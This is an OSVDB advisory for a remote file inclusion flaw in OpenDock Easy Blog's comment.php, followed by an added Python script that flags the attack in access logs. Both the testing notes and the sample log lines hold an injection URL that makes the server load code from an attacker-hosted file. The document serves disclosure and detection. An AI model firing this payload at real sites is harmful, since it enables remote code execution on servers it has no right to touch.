OpenDock Easy Blog sw/lib_comment/comment.php doc_directory Variable Remote File Inclusion

2006-10-09T07:34:59
ID OSVDB:29640
Type osvdb
Reporter Dedi Dwianto (the_day@echo.or.id)
Modified 2006-10-09T07:34:59

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[OpenDockEasyBlog_Path]/sw/lib_comment/comment.php?doc_directory=http://[attacker]/inject.txt?
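
One way to flag the request shape above in web server access logs, as an added example that is not part of the original entry. The common/combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path suffix and parameter named in this entry.
SCRIPT_SUFFIX = "/sw/lib_comment/comment.php"
PARAM = "doc_directory"

# A value beginning with "scheme://" (http, ftp, php, ...) would make an
# include of that variable resolve through a stream wrapper, not a local path.
WRAPPER_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# Request line of a common/combined-format access log entry (assumed format).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def is_suspicious(target):
    """True if the request target sets doc_directory on comment.php to a URL."""
    parts = urlsplit(target)
    if not unquote(parts.path).lower().endswith(SCRIPT_SUFFIX):
        return False
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; unquote again to catch double encoding.
        if name == PARAM and WRAPPER_VALUE.match(unquote(value)):
            return True
    return False

def scan(lines):
    """Return (line_number, client, target) for each matching log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m and is_suspicious(m.group("target")):
            hits.append((number, line.split()[0], m.group("target")))
    return hits

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Oct/2006:07:40:01 +0000] "GET /blog/index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Oct/2006:07:41:12 +0000] "GET /blog/sw/lib_comment/comment.php?doc_directory=http://198.51.100.9/inject.txt? HTTP/1.0" 200 312',
    '203.0.113.7 - - [09/Oct/2006:07:41:15 +0000] "GET /blog/sw/lib_comment/comment.php?doc_directory=ftp%3A%2F%2F198.51.100.9%2Fa.txt%3F HTTP/1.1" 200 312',
    '192.0.2.10 - - [09/Oct/2006:07:42:30 +0000] "GET /blog/sw/lib_comment/comment.php?id=4 HTTP/1.1" 200 900',
    '192.0.2.44 - - [09/Oct/2006:07:43:02 +0000] "GET /other/page.php?doc_directory=http://198.51.100.9/x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs normally record only the query string; with register_globals on, the same variable can also arrive in POST or cookie data, which this check does not see.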

References:

Vendor URL: http://web.opendock.net/
Security Tracker: 1017027
Secunia Advisory ID: 22335
Related OSVDB ID: 29634
Related OSVDB ID: 29636
Related OSVDB ID: 29637
Related OSVDB ID: 29638
Related OSVDB ID: 29635
Related OSVDB ID: 29639
Related OSVDB ID: 29641
Related OSVDB ID: 29642
Other Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html
Keyword: ECHO_ADV_50$2006
ISS X-Force ID: 29399
Generic Exploit URL: http://milw0rm.com/exploits/2495
FrSIRT Advisory: ADV-2006-3970
CVE-2006-5244
Bugtraq ID: 20408